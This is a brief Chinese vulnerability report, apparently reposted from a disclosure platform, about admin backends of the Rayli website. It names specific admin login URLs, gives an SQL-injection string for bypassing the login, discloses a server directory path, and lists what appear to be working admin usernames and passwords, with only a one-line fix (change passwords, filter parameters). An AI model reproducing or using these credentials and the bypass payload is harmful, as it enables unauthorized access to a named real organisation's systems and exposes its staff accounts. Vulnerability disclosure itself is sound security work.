瑞丽 分站后台验证绕过+SQL注入+路径泄漏 -电脑资料

    瑞丽 分站后台弱口令+SQL注入，不是废弃的

    用'or''=''or''='尝试登录后帐号密码自己就跳出来了

    http://lifestyle.rayli.com.cn/manager/index.php->/data/www/wwwroot/lifestyle/

    http://lifestyle.rayli.com.cn/manager/login.php

    admin admin

    liulongjun liulongjun@rayli

    zengyujie zengyujie@rayli

    http://video.rayli.com.cn/ec/

    admin admin

    漏洞证明：

    修复方案：

    改密码，过滤参数...

    作者 zhk